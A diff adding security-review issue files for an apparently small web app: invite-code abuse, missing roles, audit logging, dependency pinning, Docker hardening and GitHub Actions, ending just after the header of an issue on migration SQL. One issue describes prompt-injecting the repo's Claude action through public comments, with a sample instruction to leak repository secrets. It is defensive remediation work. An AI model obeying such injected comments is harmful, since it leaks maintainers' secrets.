+- **Targeted lurker.** Mallory wants to surveil Alice's recovery group. With no rate limit, Mallory runs `curl POST /auth/register` in a loop with guessed invite codes. 2^40 is infeasible to exhaust, but real groups often regenerate codes to the same 8-char space from the same `secrets` RNG — so if Mallory already has one code from a public poster flyer and wants to join a *different* group, it remains infeasible. The real risk is the combination with **code leakage** — groups post codes to Slack, GitHub issues, emails.
+- **Code leak.** A code is pasted into a public chat channel. Anyone who sees it joins. No expiration, no single-use.
+
+## Where
+
+- `backend/app/services.py:866-887` — generation & lookup.
+- `backend/app/routers/auth.py:29-45` — join via invite code on register.
+- `backend/app/routers/settings.py:78-105` — generate / revoke.
+
+## Recommended fix
+
+### Expiration & single-use
+
+```python
+# backend/app/models.py — extend Group (or new InviteCode table)
+class InviteCode(Base):
+    __tablename__ = "invite_codes"
+    id: Mapped[int] = mapped_column(primary_key=True)
+    group_id: Mapped[int] = mapped_column(ForeignKey("groups.id"), nullable=False)
+    code_hash: Mapped[str] = mapped_column(String(64), unique=True, nullable=False)
+    # ^ Store sha256(code) — even if DB is dumped, raw codes stay secret.
+    created_at: Mapped[datetime] = mapped_column(DateTime, default=lambda: datetime.now(UTC))
+    expires_at: Mapped[datetime] = mapped_column(DateTime, nullable=False)
+    max_uses: Mapped[int] = mapped_column(Integer, nullable=False, default=1)
+    uses: Mapped[int] = mapped_column(Integer, nullable=False, default=0)
+    revoked_at: Mapped[datetime | None] = mapped_column(DateTime, nullable=True)
+    created_by: Mapped[int] = mapped_column(ForeignKey("users.id"), nullable=False)
+```
+
+Default policy: **24-hour** expiry, **1 use**. Admin can toggle longer / multi-use per code.
+
+Lookup compares `sha256(code)` against `code_hash`, enforces `expires_at > now` and `uses < max_uses` and `revoked_at is null`, and increments `uses` atomically on successful join.
+
+### Admin approval
+
+Optionally require existing group members to approve a pending join. Add a `PendingMember` model with `approved_at`; on register, create the pending row and send an in-app notification. This aligns with [#12](./12-medium-no-rbac-or-admin-roles.md).
+
+### Notification
+
+Email (or in-app toast shown at next login) notifies existing members "X joined the group" with timestamp and the inviter. Enables social detection of abuse.
+
+### Rate limit
+
+Per-IP `5/min, 30/hour` on `/auth/register?invite_code=...` via slowapi ([#04](./04-high-no-auth-rate-limiting.md)). Consider a per-group failure counter — after N wrong codes against one group, require a slowdown / CAPTCHA.
+
+### Constant-time comparison
+
+When validating:
+
+```python
+import hmac
+candidate_hash = hashlib.sha256(code.upper().encode()).digest()
+for row in candidate_rows:
+    if hmac.compare_digest(candidate_hash, bytes.fromhex(row.code_hash)):
+        ...
+```
+
+(Per-group comparisons are few; constant-time is mostly symbolic but good hygiene.)
+
+### Strengthen code space (optional)
+
+Move to 10-char codes with a 36-char alphabet (10^10 ≈ 2^50 entropy in the same human-friendly Crockford-Base32 space).
+
+## Acceptance criteria
+
+- [ ] Invite codes expire after 24h by default; admin can set 1–30 days.
+- [ ] Codes are hashed at rest (DB inspection does not reveal valid codes).
+- [ ] Per-IP rate limit on `/auth/register` returns 429 after 5 attempts in 60s.
+- [ ] Joining a group sends a notification event to other members.
+- [ ] Tests cover: expired code → 400, revoked code → 400, already-used single-use code → 400, case-insensitive match → 200.
+
+## References
+
+- OWASP "Invitation Links" pattern: https://cheatsheetseries.owasp.org/cheatsheets/Forgot_Password_Cheat_Sheet.html
+- CWE-330: https://cwe.mitre.org/data/definitions/330.html

--- a/plans/git-issues/security-review/12-medium-no-rbac-or-admin-roles.md
+++ b/plans/git-issues/security-review/12-medium-no-rbac-or-admin-roles.md
@@ -1,0 +1,114 @@
+# [Medium] No intra-group roles — every member is effectively an admin
+
+**Severity:** 🟡 Medium
+**CVSS v3.1 (estimated):** 6.3 — AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:L
+**CWEs:** CWE-284 (Improper Access Control), CWE-250 (Execution with Unnecessary Privileges), CWE-863 (Incorrect Authorization)
+**OWASP:** A01:2021 Broken Access Control, API5:2023 Broken Function-Level Authorization, ASVS V4.1 / V4.2
+
+## Summary
+
+Every authenticated user in a group can:
+
+- Rename the group (`PUT /settings/`)
+- Change the meeting day / time / format rotation
+- Generate or revoke invite codes
+- Create / delete topics
+- Draw / undo / reshuffle the topic deck
+- Schedule or remove speakers
+- Create / edit / delete reading assignments and book positions
+- Set per-date format overrides
+- Edit or cancel past meeting logs (`PUT /meetings/log/{id}`)
+- Update dana (financial) amounts
+- Export the full meeting history
+
+There is no distinction between "group admin" (the secretary) and "member" (a newcomer who just joined with an invite code). Once a user is authenticated and attached to a `group_id`, they are effectively a group administrator.
+
+Combined with invite-code abuse ([#11](./11-medium-invite-code-abuse.md)), a single brute-forced or leaked code hands full admin authority over the group to an attacker, with no visible change to existing members other than the new row in `users`.
+
+This is also the enabling condition for stored XSS ([#02](./02-critical-stored-xss-html-export.md)) and CSV injection ([#03](./03-high-csv-formula-injection.md)): a "member" can plant payloads under admin-level data without any friction.
+
+## Where
+
+- `backend/app/models.py:92-108` — `User` has no role column.
+- `backend/app/auth.py:40-65` — `get_current_user` returns any authenticated user.
+- All mutating endpoints across `backend/app/routers/*` — none check for admin role.
+
+## Recommended fix
+
+### Data model
+
+```python
+# backend/app/models.py
+from enum import Enum
+
+class Role(str, Enum):
+    ADMIN = "admin"
+    SECRETARY = "secretary"
+    MEMBER = "member"
+
+
+class User(Base):
+    ...
+    role: Mapped[str] = mapped_column(String(16), nullable=False, default=Role.MEMBER.value)
+```
+
+Migration path:
+- The creator of a group (`register` path that creates a new group — `routers/auth.py:47-75`) gets `role="admin"`.
+- Users joining via invite code get `role="member"`.
+- An existing data migration sets every pre-existing user of a group to `"admin"` if they are the sole member, else the earliest-created user.
+
+### Dependency helpers
+
+```python
+# backend/app/auth.py
+def require_role(*roles: Role):
+    def _inner(user: User = Depends(get_current_user)) -> User:
+        if user.role not in {r.value for r in roles}:
+            raise HTTPException(403, "Insufficient privileges")
+        return user
+    return _inner
+
+require_admin = require_role(Role.ADMIN)
+require_secretary = require_role(Role.ADMIN, Role.SECRETARY)
+```
+
+### Route annotation
+
+| Endpoint | Role |
+|----------|------|
+| `GET` everywhere | any authenticated |
+| `PUT /settings/` | admin |
+| `POST/DELETE /settings/invite-code` | admin |
+| `POST /setup/*` | admin |
+| `POST /topics/` / `DELETE /topics/{id}` | secretary |
+| `POST /topics/draw|undo|reshuffle` | secretary |
+| `POST /speakers/schedule` / `DELETE /speakers/schedule/{date}` | secretary |
+| `PUT|DELETE /overrides/*` | secretary |
+| `PUT /meetings/log/*` | secretary |
+| `POST /meetings/cancel` | secretary |
+| `PUT /meetings/*/dana` | admin |
+| Book/plan mutations | secretary |
+
+(A "secretary" is an elevated member who runs meetings but can't change the group name or membership; the rotating person can be any member promoted by an admin. Tune as the community wants.)
+
+### Admin-role audit
+
+Every successful admin-only action is written to `ActivityLog` with `action="admin_<...>"` for high-signal review.
+
+### UI
+
+Hide buttons the current user lacks privileges for (defence-in-depth — server still enforces). Add a Members tab in Settings where admins can change roles, kick members, and see pending invites.
+
+## Acceptance criteria
+
+- [ ] `User.role` column exists with values in `{admin, secretary, member}`.
+- [ ] Attempt to `PUT /settings/` as a non-admin returns HTTP 403.
+- [ ] Frontend hides admin-only controls when `current_user.role != "admin"`.
+- [ ] Integration tests verify role enforcement for each listed endpoint.
+- [ ] Admin cannot downgrade themselves to non-admin if they are the sole admin of the group (prevent lockout).
+
+## References
+
+- OWASP "Access Control": https://cheatsheetseries.owasp.org/cheatsheets/Access_Control_Cheat_Sheet.html
+- CWE-284: https://cwe.mitre.org/data/definitions/284.html
+- NIST SP 800-162 (ABAC): https://csrc.nist.gov/publications/detail/sp/800-162/final

--- a/plans/git-issues/security-review/13-medium-audit-log-silent-failure.md
+++ b/plans/git-issues/security-review/13-medium-audit-log-silent-failure.md
@@ -1,0 +1,111 @@
+# [Medium] Activity log silently swallows all errors — audit integrity is compromised
+
+**Severity:** 🟡 Medium
+**CVSS v3.1 (estimated):** 4.9 — AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:L
+**CWEs:** CWE-778 (Insufficient Logging), CWE-390 (Detection of Error Condition Without Action), CWE-223 (Omission of Security-relevant Information)
+**OWASP:** A09:2021 Security Logging and Monitoring Failures, ASVS V7.1 / V8.3.1
+
+## Summary
+
+```python
+# backend/app/services.py:54-72
+def log_activity(...) -> None:
+    try:
+        entry = ActivityLog(...)
+        db.add(entry)
+        db.commit()
+    except Exception:
+        db.rollback()
+```
+
+A bare `except Exception` followed by silent `rollback()` makes the audit log **best-effort** in the worst possible sense — every failure is swallowed with no stderr, no structured log, no metric. Specific issues:
+
+1. **No logging of the swallow.** If the `ActivityLog` table is missing (migration not run), if a constraint fails, or if the DB is read-only, the app continues as if everything is fine.
+2. **Commit happens inside the audit function.** Any in-flight transaction from the calling handler gets committed with potentially partial state (the handler normally does its own commit before calling `log_activity`, so this isn't catastrophic today, but it's fragile).
+3. **`log_activity` is called post-commit**, which means the audit row is committed *separately* from the action it describes. If `log_activity` fails, the action happened but the audit row didn't.
+4. **No log shipping.** ActivityLog lives in the primary DB; an attacker who gains DB write access can erase their tracks.
+5. **`/activity/` endpoint returns the last 50 rows only** (`routers/activity.py:14-26`) with no pagination, filtering, or admin-only guard. Any member can read it (fine for intra-group visibility), but operators can't see cross-group audit data.
+6. **User-controlled `details` field** is stored without control-character filtering — see [#21](./21-low-activity-log-injection.md).
+
+## Where
+
+- `backend/app/services.py:54-72` — `log_activity`.
+- `backend/app/routers/activity.py:14-26` — activity endpoint.
+- `backend/app/models.py:231-257` — `ActivityLog` model.
+
+## Recommended fix
+
+### Log the swallow
+
+```python
+import logging
+logger = logging.getLogger("rd_log.audit")
+
+def log_activity(db, group, user, action, details=None) -> None:
+    try:
+        db.add(ActivityLog(group_id=group.id, user_id=user.id, action=action, details=details))
+        db.commit()
+    except Exception:
+        db.rollback()
+        logger.exception(
+            "audit log write failed",
+            extra={"group_id": group.id, "user_id": user.id, "action": action},
+        )
+        # Fall back to structured stderr JSON so log shippers still see the event.
+        logger.error("AUDIT_FALLBACK", extra={
+            "group_id": group.id, "user_id": user.id,
+            "action": action, "details": details,
+            "timestamp": datetime.now(UTC).isoformat(),
+        })
+```
+
+### Write-ahead shipping
+
+- Add a second sink: for production, emit structured JSON to stdout so Railway's log shipper captures it. Even if the DB is wiped, the observability stack has a copy.
+- Optionally ship to an append-only store (S3 + Object Lock, or a separate tenant-isolated DB).
+
+### Atomicity with the calling action
+
+Perform the audit insert *within* the same transaction as the action:
+
+```python
+# Use db.flush() in log_activity (not commit). Let the caller commit once.
+def log_activity(db, ...):
+    db.add(ActivityLog(...))
+    db.flush()   # raises on failure, caller rolls back
+```
+
+This way, either the action *and* its audit row are both persisted or neither is.
+
+### Audit-only admin endpoint
+
+Add `GET /admin/activity` for the platform operator (role `operator`, not in-group role) that paginates and filters by group/user/date. Enforce read-only; no delete.
+
+### Log what matters
+
+Currently `log_activity` is called on `topic_drawn`, `deck_reshuffled`, `topic_undo`, `speaker_scheduled`, `speaker_removed`, `meeting_cancelled`, `meeting_restored`, `settings_updated`. Add:
+- `user_registered` / `user_logged_in` / `user_logged_out`
+- `invite_code_created` / `invite_code_revoked`
+- `invite_code_used` (the join event — currently NOT logged)
+- `password_changed` (once password-change exists)
+- Failed login attempts with username + IP (retained 30 days only; tie with [#04](./04-high-no-auth-rate-limiting.md))
+- `export_downloaded` with `format=csv|printable`, `row_count`, `date_range`
+- `assignment_deleted`, `meeting_log_updated`
+
+### Retention & privacy
+
+ActivityLog stores PII (usernames, speaker names). Document a retention policy (e.g. 365 days) with a periodic purge job, and redact on export where appropriate.
+
+## Acceptance criteria
+
+- [ ] `log_activity` failures produce a structured stderr JSON log with the intended payload.
+- [ ] Login, logout, registration, invite-create, invite-use, password-change, export events are all written to `ActivityLog`.
+- [ ] Audit row and the mutation it describes are in the same DB transaction.
+- [ ] Admin audit view paginates 50-per-page with filters by user/action/date.
+- [ ] Retention job exists (`backend/app/jobs/purge_activity.py`) and tests verify it.
+
+## References
+
+- OWASP Logging Cheat Sheet: https://cheatsheetseries.owasp.org/cheatsheets/Logging_Cheat_Sheet.html
+- CWE-778: https://cwe.mitre.org/data/definitions/778.html
+- NIST SP 800-92 (Computer Security Log Management): https://csrc.nist.gov/publications/detail/sp/800-92/final

--- a/plans/git-issues/security-review/14-medium-dependency-pinning-and-scanning.md
+++ b/plans/git-issues/security-review/14-medium-dependency-pinning-and-scanning.md
@@ -1,0 +1,164 @@
+# [Medium] Unpinned Python dependencies and no CI dependency-vulnerability gate
+
+**Severity:** 🟡 Medium
+**CVSS v3.1 (estimated):** 5.5 — AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L
+**CWEs:** CWE-1104 (Use of Unmaintained Third-Party Components), CWE-1357 (Reliance on Insufficiently Trustworthy Component), CWE-937 (Using Components with Known Vulnerabilities)
+**OWASP:** A06:2021 Vulnerable and Outdated Components, A08:2021 Software & Data Integrity Failures, SSDF PW.4
+
+## Summary
+
+### Python (backend)
+
+`backend/requirements.txt` uses `>=` version specifiers for every package. There is no `requirements.lock` / Poetry lockfile / pip-tools `requirements.txt` with pinned hashes. A rebuild picks up whatever was latest on PyPI at image-build time. Combined with Railway's cache behaviours, two successive deploys can silently ship different dependency graphs.
+
+```
+fastapi>=0.129.0
+uvicorn[standard]>=0.41.0
+sqlalchemy>=2.0.0
+alembic>=1.18.0
+pydantic>=2.12.0
+pydantic-settings>=2.13.0
+PyJWT[crypto]>=2.8.0
+bcrypt>=4.0.0
+python-multipart>=0.0.22
+```
+
+`pip-audit>=2.6.0` is listed in `pyproject.toml` optional `dev`, but **is not executed in `.github/workflows/ci.yml`**. `backend/scripts/check-all.sh` isn't in the repo at the top level — unclear whether pip-audit runs locally. Either way, CI has no visible gate on known CVEs.
+
+### Node (frontend)
+
+`frontend/package.json` uses `^` caret ranges. `package-lock.json` is committed (good — reproducible builds locally). But `npm audit` is not run in CI. Dependabot / Renovate are not configured.
+
+### GitHub Actions
+
+`ci.yml` uses `actions/checkout@v4` and `actions/setup-node@v4` / `actions/setup-python@v5`. The Claude Code actions use `anthropics/claude-code-action@v1`. None are pinned to commit SHAs; a compromised or hijacked `@v4` tag on a third-party action is a supply-chain risk.
+
+### Dockerfile
+
+`FROM node:20-alpine` and `FROM python:3.12-slim` are unpinned by digest. `pip install --no-cache-dir -r requirements.txt` with no `--require-hashes`.
+
+## Where
+
+- `backend/requirements.txt` (all lines)
+- `backend/pyproject.toml:16-28` (dev deps not enforced in CI)
+- `.github/workflows/ci.yml` (no audit steps)
+- `.github/workflows/claude*.yml` (actions pinned to `@v1/@v4/@v5` tags)
+- `Dockerfile:2, 10` (no image digests)
+
+## Recommended fix
+
+### Python
+
+- Introduce `pip-tools` (or `uv pip compile`):
+  ```bash
+  # backend/requirements.in
+  fastapi
+  uvicorn[standard]
+  ...
+  ```
+  ```bash
+  uv pip compile requirements.in -o requirements.txt --generate-hashes
+  pip install --require-hashes -r requirements.txt
+  ```
+- Commit `requirements.txt` (generated, hash-pinned) + `requirements.in` (human-edited).
+- In the Dockerfile, add `--require-hashes`:
+  ```dockerfile
+  RUN pip install --no-cache-dir --require-hashes -r requirements.txt
+  ```
+
+### Node
+
+- Enforce `npm ci` (already used in CI ✓) and add `npm audit --omit=dev --audit-level=high` as a CI step.
+- Enable Dependabot or Renovate with a weekly schedule and auto-merge minor/patch for green CI.
+
+### Vulnerability scanning in CI
+
+Add a new workflow `.github/workflows/security.yml`:
+
+```yaml
+name: Security
+on:
+  pull_request:
+  schedule: [ { cron: "0 6 * * 1" } ]   # Monday 06:00 UTC
+
+permissions:
+  contents: read
+  security-events: write
+
+jobs:
+  pip-audit:
+    runs-on: ubuntu-latest
+    steps:
+      - uses: actions/checkout@v4
+      - uses: actions/setup-python@v5
+        with: { python-version: "3.12" }
+      - name: pip-audit
+        run: |
+          pip install pip-audit
+          pip-audit -r backend/requirements.txt --strict
+
+  npm-audit:
+    runs-on: ubuntu-latest
+    steps:
+      - uses: actions/checkout@v4
+      - uses: actions/setup-node@v4
+        with: { node-version: 20, cache: npm, cache-dependency-path: frontend/package-lock.json }
+      - run: npm ci --prefix frontend
+      - run: npm audit --prefix frontend --audit-level=high
+
+  codeql:
+    uses: github/codeql-action/.github/workflows/codeql.yml@main
+    # (or inline a CodeQL job with language: [python, javascript-typescript])
+
+  sbom:
+    runs-on: ubuntu-latest
+    steps:
+      - uses: actions/checkout@v4
+      - uses: anchore/sbom-action@v0
+        with: { path: ., format: cyclonedx-json, upload-artifact: true }
+
+  gitleaks:
+    runs-on: ubuntu-latest
+    steps:
+      - uses: actions/checkout@v4
+      - uses: gitleaks/gitleaks-action@v2
+```
+
+### Pin GitHub Actions to commit SHAs
+
+```yaml
+- uses: actions/checkout@b4ffde65f46336ab88eb53be808477a3936bae11   # v4.1.1
+```
+
+Use Dependabot with `package-ecosystem: github-actions` to get automated SHA-pin bumps.
+
+### Pin base-image digests
+
+```dockerfile
+FROM node:20.12.2-alpine@sha256:...  AS frontend-build
+FROM python:3.12.4-slim@sha256:...   AS runtime
+```
+
+Refresh digests monthly via Dependabot's `docker` ecosystem.
+
+### SBOM on release
+
+Publish a CycloneDX SBOM as a release asset for each tag. Makes incident response (e.g. "are we exposed to CVE-XXXX?") fast.
+
+## Acceptance criteria
+
+- [ ] `requirements.txt` uses hash-pinned entries; `pip install --require-hashes` succeeds in Docker build.
+- [ ] CI fails on any `pip-audit` high/critical finding.
+- [ ] CI fails on any `npm audit --audit-level=high` finding for production deps.
+- [ ] All GitHub Actions are pinned to commit SHAs.
+- [ ] Dockerfile `FROM` lines include `@sha256:` digests.
+- [ ] Dependabot configured for `pip`, `npm`, `docker`, `github-actions`.
+- [ ] CodeQL workflow runs weekly.
+- [ ] Gitleaks scan runs on PRs.
+
+## References
+
+- SSDF PW.4: https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-218.pdf
+- SLSA supply-chain framework: https://slsa.dev/
+- `pip-audit`: https://pypi.org/project/pip-audit/
+- Gitleaks: https://github.com/gitleaks/gitleaks

--- a/plans/git-issues/security-review/15-medium-docker-container-hardening.md
+++ b/plans/git-issues/security-review/15-medium-docker-container-hardening.md
@@ -1,0 +1,122 @@
+# [Medium] Docker image runs as root and ships unnecessary build tooling
+
+**Severity:** 🟡 Medium
+**CVSS v3.1 (estimated):** 5.1 — AV:L/AC:H/PR:L/UI:N/S:C/C:L/I:L/A:L
+**CWEs:** CWE-250 (Execution with Unnecessary Privileges), CWE-276 (Incorrect Default Permissions), CWE-732 (Incorrect Permission Assignment for Critical Resource)
+**OWASP:** A05:2021 Security Misconfiguration, CIS Docker Benchmark 4.1, NIST SP 800-190
+
+## Summary
+
+`Dockerfile` does not drop root, does not set a filesystem-read-only hint, exposes everything pip installed during build (including `pip` itself) in the runtime image, and has no `HEALTHCHECK`:
+
+```dockerfile
+FROM python:3.12-slim AS runtime
+WORKDIR /app
+COPY backend/requirements.txt ./
+RUN pip install --no-cache-dir -r requirements.txt
+COPY backend/app/ ./app/
+COPY --from=frontend-build /app/frontend/dist ./static/dist
+EXPOSE 8000
+CMD uvicorn app.main:application --host 0.0.0.0 --port ${PORT:-8000}
+```
+
+Consequences:
+
+- **PID 1 runs as root.** A post-exploitation foothold (RCE via any future vuln, or via a compromised dep) immediately has UID 0 in the container. Container escape CVEs in the kernel become catastrophic.
+- **`pip` remains installed.** An attacker who lands arbitrary Python exec can `pip install` malicious packages at runtime.
+- **`CMD` is shell form** (`CMD uvicorn ...`) which spawns `/bin/sh -c`; exec form (`CMD ["uvicorn", ...]`) gives cleaner signal handling (SIGTERM propagates to uvicorn directly) and avoids a shell in the tree.
+- **No `HEALTHCHECK`.** Railway has its own health probe (`railway.json`), but local Docker/Compose usage won't restart a stuck container.
+- **`EXPOSE 8000` is cosmetic only** but the `CMD` binds `0.0.0.0`. In Railway this is fine; elsewhere, consider binding to `127.0.0.1` and reverse-proxying.
+- **No `.dockerignore` enforcement of secrets.** `.dockerignore` excludes `.env` — good — but does not exclude `*.sqlite3` / `*.db`. If an operator has a local `rd_log.db` with production-like data, it currently would be excluded by `*.db` — OK. Still worth explicit tests.
+
+## Where
+
+- `Dockerfile` (full file)
+- `.dockerignore`
+
+## Recommended fix
+
+```dockerfile
+# syntax=docker/dockerfile:1.7
+
+# ---- Stage 1: frontend build ---------------------------------------------
+FROM node:20.12.2-alpine@sha256:<digest> AS frontend-build
+WORKDIR /app/frontend
+COPY frontend/package.json frontend/package-lock.json ./
+RUN npm ci --no-audit --no-fund
+COPY frontend/ ./
+RUN npm run build
+
+# ---- Stage 2: python deps (separate so we can drop pip from runtime) -----
+FROM python:3.12.4-slim@sha256:<digest> AS python-build
+WORKDIR /build
+RUN python -m venv /opt/venv
+ENV PATH=/opt/venv/bin:$PATH
+COPY backend/requirements.txt ./
+RUN pip install --no-cache-dir --require-hashes -r requirements.txt
+
+# ---- Stage 3: minimal runtime --------------------------------------------
+FROM python:3.12.4-slim@sha256:<digest> AS runtime
+
+# Non-root user
+RUN groupadd --system --gid 1001 app \
+ && useradd  --system --uid 1001 --gid app --home-dir /app --shell /sbin/nologin app
+
+WORKDIR /app
+COPY --from=python-build /opt/venv /opt/venv
+ENV PATH=/opt/venv/bin:$PATH \
+    PYTHONDONTWRITEBYTECODE=1 \
+    PYTHONUNBUFFERED=1 \
+    PYTHONHASHSEED=random
+
+COPY --chown=app:app backend/app/ ./app/
+COPY --from=frontend-build --chown=app:app /app/frontend/dist ./static/dist
+
+USER app:app
+EXPOSE 8000
+
+# Run uvicorn directly (exec form) so SIGTERM reaches it
+CMD ["uvicorn", "app.main:application", "--host", "0.0.0.0", "--port", "8000"]
+
+# Local Docker healthcheck (Railway uses its own)
+HEALTHCHECK --interval=30s --timeout=3s --start-period=10s --retries=3 \
+  CMD python -c "import urllib.request,sys; sys.exit(0 if urllib.request.urlopen('http://localhost:8000/api/health',timeout=2).status==200 else 1)"
+```
+
+### Additional hardening
+
+- Mount the data volume (if any persistent SQLite were ever used in prod) as `:ro` except for the DB path. Strongly prefer managed Postgres (Railway) over SQLite in production.
+- Run with the container read-only filesystem when possible: `read_only: true` in compose, with a tmpfs for `/tmp` only.
+- Drop Linux capabilities to none and re-add only what uvicorn needs: `--cap-drop=ALL`.
+- Seccomp: allow only the default Docker seccomp profile (Railway does this).
+
+### Static scanning
+
+Add `trivy fs .` and `trivy image <image>` steps to the security CI workflow ([#14](./14-medium-dependency-pinning-and-scanning.md)):
+
+```yaml
+- uses: aquasecurity/trivy-action@master
+  with:
+    scan-type: fs
+    severity: HIGH,CRITICAL
+    exit-code: 1
+```
+
+### Config at runtime
+
+- `PORT` should default in Python code, not only in the shell: `--port ${PORT:-8000}` works because of shell form today; with exec form, move the default into `uvicorn` config or start with a tiny entrypoint wrapper.
+
+## Acceptance criteria
+
+- [ ] `docker run --rm -it <image> id` prints `uid=1001(app)`.
+- [ ] `docker run --rm -it <image> which pip` returns non-zero (pip is absent).
+- [ ] `HEALTHCHECK` is defined and passes in local `docker compose up`.
+- [ ] `FROM` lines include `@sha256:` digests.
+- [ ] `CMD` uses exec form.
+- [ ] Trivy scan has no HIGH/CRITICAL findings in CI.
+
+## References
+
+- NIST SP 800-190: https://csrc.nist.gov/publications/detail/sp/800-190/final
+- CIS Docker Benchmark: https://www.cisecurity.org/benchmark/docker
+- Trivy: https://aquasecurity.github.io/trivy/

--- a/plans/git-issues/security-review/16-medium-github-actions-abuse.md
+++ b/plans/git-issues/security-review/16-medium-github-actions-abuse.md
@@ -1,0 +1,138 @@
+# [Medium] GitHub Actions workflows can be triggered by untrusted commenters and lack hardening
+
+**Severity:** 🟡 Medium
+**CVSS v3.1 (estimated):** 5.0 — AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L
+**CWEs:** CWE-284 (Improper Access Control), CWE-94 (Improper Control of Generation of Code — via prompt injection), CWE-829 (Inclusion of Functionality from Untrusted Control Sphere)
+**OWASP:** A08:2021 Software & Data Integrity Failures, SSDF PO.3 / PW.7
+
+## Summary
+
+Three concerns across `.github/workflows/`:
+
+### 1. `claude.yml` — `@claude` mentions trigger on untrusted comments
+
+```yaml
+on:
+  issue_comment: [created]
+  pull_request_review_comment: [created]
+  issues: [opened, assigned]
+  pull_request_review: [submitted]
+
+jobs:
+  claude:
+    if: |
+      (github.event_name == 'issue_comment' && contains(github.event.comment.body, '@claude')) ||
+      ...
+```
+
+The guard checks only that the comment body contains `@claude`. It does **not** check that the comment author is a collaborator, member, or owner of the repo. Any GitHub user who can comment on issues — which is any authenticated GitHub user, since the repo is public — can trigger Claude to run with the repo's `CLAUDE_CODE_OAUTH_TOKEN`. This is a classic prompt-injection and resource-abuse path:
+
+- **Prompt injection.** An attacker comments instructions that Claude then acts on — e.g. "create a PR that adds a new GitHub Action using `${{ secrets.*}}` and prints it".
+- **Cost / DoS.** Any visitor can burn OAuth budget by flooding comments.
+- **Token scope.** The `claude_code_oauth_token` is an OAuth token tied to the account that created it; if its scope is broad, abuse surface is broad.
+
+### 2. `code-review.yml` — runs on every PR with write permission
+
+```yaml
+on:
+  pull_request: [opened, synchronize, reopened]
+permissions:
+  pull-requests: write
+  ...
+```
+
+`pull_request` events from **forks** do not receive repository secrets by default (GitHub's built-in protection), but:
+
+- `CLAUDE_CODE_OAUTH_TOKEN` **is** being passed here. If this action ever switches to `pull_request_target`, it gains write access to the PR's target repo while executing code from the PR's fork. The official Claude Code action docs caution against this, but the trap is easy to stumble into during iteration.
+- `claude_args: '--allowed-tools "Bash(gh pr comment:*)..."'` relies on the action's allow-list enforcement being bug-free. If Claude is ever manipulated into invoking another shell interpreter or concatenating args, the allow-list can be circumvented.
+
+### 3. Actions pinned by tag, not by SHA
+
+Every `uses:` references `@v1`, `@v4`, `@v5` tag — a moving target. Tags can be force-pushed. A compromised tag publishes malicious code into a workflow that has the repo's secrets.
+
+See [#14](./14-medium-dependency-pinning-and-scanning.md) for pinning remediation.
+
+## Where
+
+- `.github/workflows/claude.yml` (full file)
+- `.github/workflows/code-review.yml` (full file)
+- `.github/workflows/claude-code-review.yml` (full file)
+- `.github/workflows/ci.yml`
+
+## Recommended fix
+
+### Restrict `@claude` triggers to trusted authors
+
+```yaml
+jobs:
+  claude:
+    if: |
+      (
+        github.event.comment.author_association == 'OWNER'
+        || github.event.comment.author_association == 'MEMBER'
+        || github.event.comment.author_association == 'COLLABORATOR'
+      ) && (
+        (github.event_name == 'issue_comment' && contains(github.event.comment.body, '@claude'))
+        || (github.event_name == 'pull_request_review_comment' && contains(github.event.comment.body, '@claude'))
+        || (github.event_name == 'pull_request_review' && contains(github.event.review.body, '@claude'))
+        || (github.event_name == 'issues' && (contains(github.event.issue.body, '@claude') || contains(github.event.issue.title, '@claude')))
+      )
+```
+
+Or, more conservatively, a hard allowlist of usernames:
+
+```yaml
+if: contains(fromJson('["geoffe-ga", "other-maintainer"]'), github.actor)
+```
+
+### Principle of least privilege on `GITHUB_TOKEN`
+
+- `claude.yml` declares `contents: read, pull-requests: read, issues: read, id-token: write, actions: read`. Drop `id-token: write` unless OIDC federation is actually used. Drop `actions: read` if PR-context isn't needed.
+- `code-review.yml` declares `pull-requests: write`. Keep it, but consider moving PR commenting to a separate job that only runs on trusted events.
+
+### Use `workflow_run` / split-PR pattern
+
+Industry standard for security-sensitive PR automation:
+1. `pull_request` from a fork runs a **build-only** job with no secrets.
+2. `workflow_run` triggered on the first workflow's completion runs the **privileged** steps (comment, label, deploy preview) with access to secrets but **does not** check out fork code.
+
+This ensures fork-sourced code never runs with production secrets.
+
+### Pin to SHAs + Dependabot
+
+```yaml
+uses: actions/checkout@b4ffde65f46336ab88eb53be808477a3936bae11  # v4.1.1
+uses: anthropics/claude-code-action@<full-sha>                   # v1.X.Y
+```
+
+Add a `.github/dependabot.yml` with `package-ecosystem: github-actions` to automate SHA bumps.
+
+### Add a `required-ci` branch-protection rule
+
+- Require CI success before merge.
+- Require at least one approving review.
+- Disallow force-push to `main`.
+- Require signed commits (see GPG/SSH commit signing).
+
+### Scoped Claude OAuth token
+
+- Review the OAuth token's scope. Grant the minimum needed (e.g. issues / PRs only, not repo content writes).
+- Rotate it. Document rotation in `docs/operations/secrets.md`.
+
+### CodeQL / SAST
+
+Add a `codeql.yml` workflow (see [#14](./14-medium-dependency-pinning-and-scanning.md)). CodeQL catches many template-injection and missing-auth patterns in Python and TypeScript.
+
+## Acceptance criteria
+
+- [ ] `@claude` mentions from non-collaborators do **not** trigger the workflow (verify by commenting from a burner account).
+- [ ] All `uses:` lines are pinned to commit SHAs.
+- [ ] Dependabot configured for `github-actions`.
+- [ ] Branch protection on `main` requires CI + 1 review + no force-push.
+- [ ] CodeQL workflow runs on every PR and on a weekly schedule.
+
+## References
+
+- GitHub Actions Security Guide: https://docs.github.com/en/actions/security-guides/security-hardening-for-github-actions
+- "Keeping your GitHub Actions and workflows secure Part 1–3" (StackHawk): https://securitylab.github.com/research/github-actions-untrusted-input/
+- Allstar / Scorecard: https://github.com/ossf/allstar, https://github.com/ossf/scorecard

--- a/plans/git-issues/security-review/17-medium-migration-sql-risk-and-race.md
+++ b/plans/git-issues/security-review/17-medium-migration-sql-risk-and-race.md
@@ -1,0 +1,117 @@
+# [Medium] Startup migrations use f-string SQL and race across replicas
+
+**Severity:** 🟡 Medium
+**CVSS v3.1 (estimated):** 4.6 — AV:N/AC:H/PR:H/UI:N/S:U/C:L/I:L/A:L
+**CWEs:** CWE-89 (SQL Injection — latent/pattern), CWE-362 (Race Condition), CWE-710 (Improper Adherence to Coding Standards)
+**OWASP:** A03:2021 Injection (pattern), A05:2021 Security Misconfiguration
+
+## Summary
+
